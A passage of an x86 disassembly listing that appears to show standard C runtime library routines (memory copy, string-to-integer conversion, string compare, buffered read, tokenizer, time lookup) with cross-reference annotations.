dd offset loc_4183EC
dd offset loc_4183E4
dd offset loc_4183DC
dd offset loc_4183D4
dd offset loc_4183CC
dd offset loc_4183C4
dd offset loc_4183BC
; ---------------------------------------------------------------------------
loc_4183BC: ; CODE XREF: sub_4182C0:loc_41831C�j
; DATA XREF: sub_4182C0+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_4183C4: ; CODE XREF: sub_4182C0:loc_41831C�j
; DATA XREF: sub_4182C0+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_4183CC: ; CODE XREF: sub_4182C0:loc_41831C�j
; DATA XREF: sub_4182C0+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4183D4: ; CODE XREF: sub_4182C0:loc_41831C�j
; DATA XREF: sub_4182C0+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4183DC: ; CODE XREF: sub_4182C0:loc_41831C�j
; DATA XREF: sub_4182C0+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4183E4: ; CODE XREF: sub_4182C0:loc_41831C�j
; DATA XREF: sub_4182C0+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4183EC: ; CODE XREF: sub_4182C0:loc_41831C�j
; DATA XREF: sub_4182C0+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4183FF: ; CODE XREF: sub_4182C0:loc_41831C�j
; DATA XREF: sub_4182C0:off_41839C�o
jmp off_418408[edx*4]
; ---------------------------------------------------------------------------
align 4
off_418408 dd offset loc_418418 ; DATA XREF: sub_4182C0+35�r
; sub_4182C0+92�r ...
dd offset loc_418420
dd offset loc_41842C
dd offset loc_418440
; ---------------------------------------------------------------------------
loc_418418: ; CODE XREF: sub_4182C0+35�j
; sub_4182C0+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_418420: ; CODE XREF: sub_4182C0+35�j
; sub_4182C0+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41842C: ; CODE XREF: sub_4182C0+35�j
; sub_4182C0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_418440: ; CODE XREF: sub_4182C0+35�j
; sub_4182C0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_418458: ; CODE XREF: sub_4182C0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41848C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_418480
std
rep movsd
cld
jmp off_4185A0[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_418480: ; CODE XREF: sub_4182C0+1B1�j
; sub_4182C0+208�j ...
neg ecx
jmp off_418550[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41848C: ; CODE XREF: sub_4182C0+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_4184A4
and eax, 3
sub ecx, eax
jmp dword ptr loc_4184A4+4[eax*4]
; ---------------------------------------------------------------------------
loc_4184A4: ; CODE XREF: sub_4182C0+1D6�j
; DATA XREF: sub_4182C0+1DD�r
jmp off_4185A0[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4184B7+1
; ---------------------------------------------------------------------------
fadd dword ptr [ecx+eax*2+41850000h]
loc_4184B7: ; DATA XREF: sub_4182C0+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_418480
std
rep movsd
cld
jmp off_4185A0[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_418480
std
rep movsd
cld
jmp off_4185A0[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_418480
std
rep movsd
cld
jmp off_4185A0[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_418554
dd offset loc_41855C
dd offset loc_418564
dd offset loc_41856C
dd offset loc_418574
dd offset loc_41857C
dd offset loc_418584
off_418550 dd offset loc_418597 ; DATA XREF: sub_4182C0+1C2�r
; ---------------------------------------------------------------------------
loc_418554: ; DATA XREF: sub_4182C0+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41855C: ; DATA XREF: sub_4182C0+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_418564: ; DATA XREF: sub_4182C0+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41856C: ; DATA XREF: sub_4182C0+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_418574: ; DATA XREF: sub_4182C0+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_41857C: ; DATA XREF: sub_4182C0+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_418584: ; DATA XREF: sub_4182C0+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_418597: ; CODE XREF: sub_4182C0+1C2�j
; DATA XREF: sub_4182C0:off_418550�o
jmp off_4185A0[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_4185A0 dd offset loc_4185B0 ; DATA XREF: sub_4182C0+1B7�r
; sub_4182C0:loc_4184A4�r ...
dd offset loc_4185B8
dd offset loc_4185C8
dd offset loc_4185DC
; ---------------------------------------------------------------------------
loc_4185B0: ; CODE XREF: sub_4182C0+1B7�j
; sub_4182C0:loc_4184A4�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4185B8: ; CODE XREF: sub_4182C0+1B7�j
; sub_4182C0:loc_4184A4�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4185C8: ; CODE XREF: sub_4182C0+1B7�j
; sub_4182C0:loc_4184A4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4185DC: ; CODE XREF: sub_4182C0+1B7�j
; sub_4182C0:loc_4184A4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_4182C0 endp
; =============== S U B R O U T I N E =======================================
sub_4185F5 proc near ; CODE XREF: sub_40473F+34�p
; sub_40473F+4F�p ...
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_417B9B
pop ecx
pop ecx
retn
sub_4185F5 endp
; =============== S U B R O U T I N E =======================================
sub_418603 proc near ; CODE XREF: sub_418670+4�p
arg_0 = dword ptr 4
push esi
push ds:dword_4CF03C
call sub_41D5A8
mov edx, ds:dword_4CF03C
pop ecx
mov ecx, ds:dword_4CF038
mov esi, ecx
sub esi, edx
add esi, 4
cmp eax, esi
pop esi
jnb short loc_418662
push edx
call sub_41D5A8
add eax, 10h
push eax
push ds:dword_4CF03C
call sub_41944F
add esp, 0Ch
test eax, eax
jnz short loc_418645
retn
; ---------------------------------------------------------------------------
loc_418645: ; CODE XREF: sub_418603+3F�j
mov ecx, ds:dword_4CF038
sub ecx, ds:dword_4CF03C
mov ds:dword_4CF03C, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov ds:dword_4CF038, ecx
loc_418662: ; CODE XREF: sub_418603+23�j
mov eax, [esp+arg_0]
mov [ecx], eax
add ds:dword_4CF038, 4
retn
sub_418603 endp
; =============== S U B R O U T I N E =======================================
sub_418670 proc near ; CODE XREF: sub_40482C+1A�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_418603
neg eax
sbb eax, eax
pop ecx
neg eax
dec eax
retn
sub_418670 endp
; =============== S U B R O U T I N E =======================================
sub_418682 proc near ; DATA XREF: _2:00426018�o
push 80h
call sub_417B89
test eax, eax
pop ecx
mov ds:dword_4CF03C, eax
jnz short loc_4186A3
push 18h
call sub_419CDA
mov eax, ds:dword_4CF03C
pop ecx
loc_4186A3: ; CODE XREF: sub_418682+12�j
and dword ptr [eax], 0
mov eax, ds:dword_4CF03C
mov ds:dword_4CF038, eax
retn
sub_418682 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4186B1 proc near ; CODE XREF: sub_40494F+1B0�p
; sub_4053D5+4E�p
var_CC = byte ptr -0CCh
var_32 = word ptr -32h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0CCh
lea eax, [ebp+var_10]
push eax
call ds:dword_42406C ;; GetLocalTime
lea eax, [ebp+var_20]
push eax
call ds:dword_424190 ;; GetSystemTime
mov ax, [ebp+var_16]
cmp ax, ds:word_4CD9AA
jnz short loc_418716
mov ax, [ebp+var_18]
cmp ax, ds:word_4CD9A8
jnz short loc_418716
mov ax, [ebp+var_1A]
cmp ax, ds:word_4CD9A6
jnz short loc_418716
mov ax, [ebp+var_1E]
cmp ax, ds:word_4CD9A2
jnz short loc_418716
mov ax, [ebp+var_20]
cmp ax, ds:word_4CD9A0
jnz short loc_418716
mov eax, ds:dword_4CD998
jmp short loc_41875B
; ---------------------------------------------------------------------------
loc_418716: ; CODE XREF: sub_4186B1+28�j
; sub_4186B1+35�j ...
lea eax, [ebp+var_CC]
push eax
call ds:dword_42418C ;; GetTimeZoneInformation
cmp eax, 0FFFFFFFFh
jz short loc_418743
cmp eax, 2
jnz short loc_41873F
cmp [ebp+var_32], 0
jz short loc_41873F
cmp [ebp+var_24], 0
jz short loc_41873F
push 1
pop eax
jmp short loc_418746
; ---------------------------------------------------------------------------
loc_41873F: ; CODE XREF: sub_4186B1+7A�j
; sub_4186B1+81�j ...
xor eax, eax
jmp short loc_418746
; ---------------------------------------------------------------------------
loc_418743: ; CODE XREF: sub_4186B1+75�j
or eax, 0FFFFFFFFh
loc_418746: ; CODE XREF: sub_4186B1+8C�j
; sub_4186B1+90�j
push esi
push edi
lea esi, [ebp+var_20]
mov edi, offset word_4CD9A0
movsd
movsd
movsd
movsd
pop edi
mov ds:dword_4CD998, eax
pop esi
loc_41875B: ; CODE XREF: sub_4186B1+63�j
push eax
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_10]
push eax
call sub_41D609
mov ecx, [ebp+arg_0]
add esp, 1Ch
test ecx, ecx
jz short locret_41878B
mov [ecx], eax
locret_41878B: ; CODE XREF: sub_4186B1+D6�j
leave
retn
sub_4186B1 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418790 proc near ; CODE XREF: sub_40494F+18�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
lea eax, dword_4CDA40
cmp dword ptr [eax+8], 0
jnz short loc_4187E3
mov al, 0FFh
mov edi, edi
loc_4187AC: ; CODE XREF: sub_418790+28�j
; sub_418790+48�j
or al, al
jz short loc_4187DE
mov al, [esi]
inc esi
mov ah, [edi]
inc edi
cmp ah, al
jz short loc_4187AC
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
xchg ah, al
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
cmp al, ah
jz short loc_4187AC
sbb al, al
sbb al, 0FFh
loc_4187DE: ; CODE XREF: sub_418790+1E�j
movsx eax, al
jmp short loc_418817
; ---------------------------------------------------------------------------
loc_4187E3: ; CODE XREF: sub_418790+16�j
mov eax, 0FFh
xor ebx, ebx
mov edi, edi
loc_4187EC: ; CODE XREF: sub_418790+68�j
; sub_418790+80�j
or al, al
jz short loc_418817
mov al, [esi]
inc esi
mov bl, [edi]
inc edi
cmp al, bl
jz short loc_4187EC
push eax
push ebx
call sub_419101
mov ebx, eax
add esp, 4
call sub_419101
add esp, 4
cmp bl, al
jz short loc_4187EC
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_418817: ; CODE XREF: sub_418790+51�j
; sub_418790+5E�j
pop ebx
pop esi
pop edi
leave
retn
sub_418790 endp
; =============== S U B R O U T I N E =======================================
sub_41881C proc near ; CODE XREF: sub_41AB9C+11B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_418833
add esp, 10h
retn
sub_41881C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418833 proc near ; CODE XREF: sub_41881C+E�p
; sub_418A3B+E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
and [ebp+var_8], 0
push esi
push edi
mov edi, [ebp+arg_0]
mov bl, [edi]
lea esi, [edi+1]
mov [ebp+var_4], esi
loc_41884B: ; CODE XREF: sub_418833+46�j
cmp ds:dword_433E7C, 1
jle short loc_418863
movzx eax, bl
push 8
push eax
call sub_41A642
pop ecx
pop ecx
jmp short loc_418872
; ---------------------------------------------------------------------------
loc_418863: ; CODE XREF: sub_418833+1F�j
mov ecx, ds:off_433C70
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 8
loc_418872: ; CODE XREF: sub_418833+2E�j
test eax, eax
jz short loc_41887B
mov bl, [esi]
inc esi
jmp short loc_41884B
; ---------------------------------------------------------------------------
loc_41887B: ; CODE XREF: sub_418833+41�j
cmp bl, 2Dh
mov [ebp+var_4], esi
jnz short loc_418889
or [ebp+arg_C], 2
jmp short loc_41888E
; ---------------------------------------------------------------------------
loc_418889: ; CODE XREF: sub_418833+4E�j
cmp bl, 2Bh
jnz short loc_418894
loc_41888E: ; CODE XREF: sub_418833+54�j
mov bl, [esi]
inc esi
mov [ebp+var_4], esi
loc_418894: ; CODE XREF: sub_418833+59�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_418A2B
cmp eax, 1
jz loc_418A2B
cmp eax, 24h
jg loc_418A2B
push 10h
test eax, eax
pop ecx
jnz short loc_4188DC
cmp bl, 30h
jz short loc_4188C6
mov [ebp+arg_8], 0Ah
jmp short loc_4188F8
; ---------------------------------------------------------------------------
loc_4188C6: ; CODE XREF: sub_418833+88�j
mov al, [esi]
cmp al, 78h
jz short loc_4188D9
cmp al, 58h
jz short loc_4188D9
mov [ebp+arg_8], 8
jmp short loc_4188F8
; ---------------------------------------------------------------------------
loc_4188D9: ; CODE XREF: sub_418833+97�j
; sub_418833+9B�j
mov [ebp+arg_8], ecx
loc_4188DC: ; CODE XREF: sub_418833+83�j
cmp [ebp+arg_8], ecx
jnz short loc_4188F8
cmp bl, 30h
jnz short loc_4188F8
mov al, [esi]
cmp al, 78h
jz short loc_4188F0
cmp al, 58h
jnz short loc_4188F8
loc_4188F0: ; CODE XREF: sub_418833+B7�j
mov bl, [esi+1]
inc esi
inc esi
mov [ebp+var_4], esi
loc_4188F8: ; CODE XREF: sub_418833+91�j
; sub_418833+A4�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
mov edi, 103h
mov [ebp+var_C], eax
loc_418908: ; CODE XREF: sub_418833+16C�j
cmp ds:dword_433E7C, 1
movzx esi, bl
jle short loc_418920
push 4
push esi
call sub_41A642
pop ecx
pop ecx
jmp short loc_41892B
; ---------------------------------------------------------------------------
loc_418920: ; CODE XREF: sub_418833+DF�j
mov eax, ds:off_433C70
mov al, [eax+esi*2]
and eax, 4
loc_41892B: ; CODE XREF: sub_418833+EB�j
test eax, eax
jz short loc_418937
movsx ecx, bl
sub ecx, 30h
jmp short loc_418969
; ---------------------------------------------------------------------------
loc_418937: ; CODE XREF: sub_418833+FA�j
cmp ds:dword_433E7C, 1
jle short loc_41894B
push edi
push esi
call sub_41A642
pop ecx
pop ecx
jmp short loc_418956
; ---------------------------------------------------------------------------
loc_41894B: ; CODE XREF: sub_418833+10B�j
mov eax, ds:off_433C70
mov ax, [eax+esi*2]
and eax, edi
loc_418956: ; CODE XREF: sub_418833+116�j
test eax, eax
jz short loc_4189A4
movsx eax, bl
push eax
call sub_41D6CB
pop ecx
mov ecx, eax
sub ecx, 37h
loc_418969: ; CODE XREF: sub_418833+102�j
cmp ecx, [ebp+arg_8]
jnb short loc_4189A4
mov esi, [ebp+var_8]
or [ebp+arg_C], 8
cmp esi, [ebp+var_C]
jb short loc_41898E
jnz short loc_418988
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
cmp ecx, edx
jbe short loc_41898E
loc_418988: ; CODE XREF: sub_418833+147�j
or [ebp+arg_C], 4
jmp short loc_418997
; ---------------------------------------------------------------------------
loc_41898E: ; CODE XREF: sub_418833+145�j
; sub_418833+153�j
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_8], esi
loc_418997: ; CODE XREF: sub_418833+159�j
mov eax, [ebp+var_4]
inc [ebp+var_4]
mov bl, [eax]
jmp loc_418908
; ---------------------------------------------------------------------------
loc_4189A4: ; CODE XREF: sub_418833+125�j
; sub_418833+139�j
mov ecx, [ebp+arg_C]
dec [ebp+var_4]
mov edx, [ebp+arg_4]
test cl, 8
jnz short loc_4189C2
test edx, edx
jz short loc_4189BC
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_4189BC: ; CODE XREF: sub_418833+181�j
and [ebp+var_8], 0
jmp short loc_418A0F
; ---------------------------------------------------------------------------
loc_4189C2: ; CODE XREF: sub_418833+17D�j
test cl, 4
mov eax, 7FFFFFFFh
jnz short loc_4189E8
test cl, 1
jnz short loc_418A0F
and ecx, 2
jz short loc_4189DF
cmp [ebp+var_8], 80000000h
ja short loc_4189E8
loc_4189DF: ; CODE XREF: sub_418833+1A1�j
test ecx, ecx
jnz short loc_418A0F
cmp [ebp+var_8], eax
jbe short loc_418A0F
loc_4189E8: ; CODE XREF: sub_418833+197�j
; sub_418833+1AA�j
test byte ptr [ebp+arg_C], 1
mov ds:dword_4CD9B4, 22h
jz short loc_4189FE
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_418A0F
; ---------------------------------------------------------------------------
loc_4189FE: ; CODE XREF: sub_418833+1C3�j
mov ecx, [ebp+arg_C]
and cl, 2
neg cl
sbb ecx, ecx
neg ecx
add ecx, eax
mov [ebp+var_8], ecx
loc_418A0F: ; CODE XREF: sub_418833+18D�j
; sub_418833+19C�j ...
test edx, edx
jz short loc_418A18
mov eax, [ebp+var_4]
mov [edx], eax
loc_418A18: ; CODE XREF: sub_418833+1DE�j
test byte ptr [ebp+arg_C], 2
jz short loc_418A26
mov eax, [ebp+var_8]
neg eax
mov [ebp+var_8], eax
loc_418A26: ; CODE XREF: sub_418833+1E9�j
mov eax, [ebp+var_8]
jmp short loc_418A36
; ---------------------------------------------------------------------------
loc_418A2B: ; CODE XREF: sub_418833+66�j
; sub_418833+6F�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_418A34
mov [eax], edi
loc_418A34: ; CODE XREF: sub_418833+1FD�j
xor eax, eax
loc_418A36: ; CODE XREF: sub_418833+1F6�j
pop edi
pop esi
pop ebx
leave
retn
sub_418833 endp
; =============== S U B R O U T I N E =======================================
sub_418A3B proc near ; CODE XREF: sub_4053D5+4BD�p
; sub_40EE72+3773�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_418833
add esp, 10h
retn
sub_418A3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418A52 proc near ; CODE XREF: sub_4053D5+266�p
; sub_4053D5+46A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
mov [ebp+var_14], 49h
push eax
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_417AB0
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
push eax
call sub_41D797
add esp, 10h
leave
retn
sub_418A52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418A86 proc near ; CODE XREF: sub_405A58+4E�p
; sub_406C19+30E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov ecx, edi
test edi, edi
mov [ebp+var_4], edi
mov [ebp+arg_0], ecx
jnz short loc_418AAA
xor eax, eax
jmp loc_418B53
; ---------------------------------------------------------------------------
loc_418AAA: ; CODE XREF: sub_418A86+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_418ABD
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_418AC9
; ---------------------------------------------------------------------------
loc_418ABD: ; CODE XREF: sub_418A86+2D�j
mov [ebp+arg_C], 1000h
jmp short loc_418AC9
; ---------------------------------------------------------------------------
loc_418AC6: ; CODE XREF: sub_418A86+C4�j
mov ecx, [ebp+arg_0]
loc_418AC9: ; CODE XREF: sub_418A86+35�j
; sub_418A86+3E�j
test word ptr [esi+0Ch], 10Ch
jz short loc_418AFB
mov eax, [esi+4]
test eax, eax
jz short loc_418AFB
cmp ecx, eax
mov edi, ecx
jb short loc_418AE0
mov edi, eax
loc_418AE0: ; CODE XREF: sub_418A86+56�j
push edi
push dword ptr [esi]
push ebx
call sub_417390
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_4]
jmp short loc_418B46
; ---------------------------------------------------------------------------
loc_418AFB: ; CODE XREF: sub_418A86+49�j
; sub_418A86+50�j
cmp ecx, [ebp+arg_C]
jb short loc_418B2E
cmp [ebp+arg_C], 0
mov eax, ecx
jz short loc_418B11
xor edx, edx
div [ebp+arg_C]
mov eax, ecx
sub eax, edx
loc_418B11: ; CODE XREF: sub_418A86+80�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_41E321
add esp, 0Ch
test eax, eax
jz short loc_418B58
cmp eax, 0FFFFFFFFh
jz short loc_418B5E
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_418B46
; ---------------------------------------------------------------------------
loc_418B2E: ; CODE XREF: sub_418A86+78�j
push esi
call sub_41E248
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_418B62
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+arg_C], eax
loc_418B46: ; CODE XREF: sub_418A86+73�j
; sub_418A86+A6�j
cmp [ebp+arg_0], 0
jnz loc_418AC6
mov eax, [ebp+arg_8]
loc_418B53: ; CODE XREF: sub_418A86+1F�j
; sub_418A86+E6�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_418B58: ; CODE XREF: sub_418A86+9A�j
or dword ptr [esi+0Ch], 10h
jmp short loc_418B62
; ---------------------------------------------------------------------------
loc_418B5E: ; CODE XREF: sub_418A86+9F�j
or dword ptr [esi+0Ch], 20h
loc_418B62: ; CODE XREF: sub_418A86+B2�j
; sub_418A86+D6�j
mov eax, edi
xor edx, edx
sub eax, [ebp+arg_0]
div [ebp+arg_4]
jmp short loc_418B53
sub_418A86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418B6E proc near ; CODE XREF: sub_405AF2+2B2�p
; sub_4060D0+101�p ...
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_418B87: ; CODE XREF: sub_418B6E+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_418B87
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_418BAF
mov edx, ds:dword_4CD9B0
loc_418BAF: ; CODE XREF: sub_418B6E+39�j
; sub_418B6E+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_418BCF
test al, al
jz short loc_418BCF
inc edx
jmp short loc_418BAF
; ---------------------------------------------------------------------------
loc_418BCF: ; CODE XREF: sub_418B6E+58�j
; sub_418B6E+5C�j
mov ebx, edx
loc_418BD1: ; CODE XREF: sub_418B6E+81�j
mov al, [edx]
test al, al
jz short loc_418BF5
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_418BF1
inc edx
jmp short loc_418BD1
; ---------------------------------------------------------------------------
loc_418BF1: ; CODE XREF: sub_418B6E+7E�j
and byte ptr [edx], 0
inc edx
loc_418BF5: ; CODE XREF: sub_418B6E+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov ds:dword_4CD9B0, edx
and eax, ebx
pop ebx
leave
retn
sub_418B6E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418C10 proc near ; CODE XREF: sub_406387+1B6�p
; sub_407252+6E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_418C93
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_418C34
shr ecx, 2
jnz short loc_418CA1
jmp short loc_418C55
; ---------------------------------------------------------------------------
loc_418C34: ; CODE XREF: sub_418C10+1B�j
; sub_418C10+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_418C62
test al, al
jz short loc_418C6A
test esi, 3
jnz short loc_418C34
mov ebx, ecx
shr ecx, 2
jnz short loc_418CA1
loc_418C50: ; CODE XREF: sub_418C10+8F�j
and ebx, 3
jz short loc_418C62
loc_418C55: ; CODE XREF: sub_418C10+22�j
; sub_418C10+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_418C8E
dec ebx
jnz short loc_418C55
loc_418C62: ; CODE XREF: sub_418C10+2B�j
; sub_418C10+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_418C6A: ; CODE XREF: sub_418C10+2F�j
test edi, 3
jz short loc_418C84
loc_418C72: ; CODE XREF: sub_418C10+72�j
mov [edi], al
inc edi
dec ecx
jz loc_418D06
test edi, 3
jnz short loc_418C72
loc_418C84: ; CODE XREF: sub_418C10+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_418CF7
loc_418C8B: ; CODE XREF: sub_418C10+7F�j
; sub_418C10+F4�j
mov [edi], al
inc edi
loc_418C8E: ; CODE XREF: sub_418C10+4D�j
dec ebx
jnz short loc_418C8B
pop ebx
pop esi
loc_418C93: ; CODE XREF: sub_418C10+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_418C99: ; CODE XREF: sub_418C10+A9�j
; sub_418C10+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_418C50
loc_418CA1: ; CODE XREF: sub_418C10+20�j
; sub_418C10+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
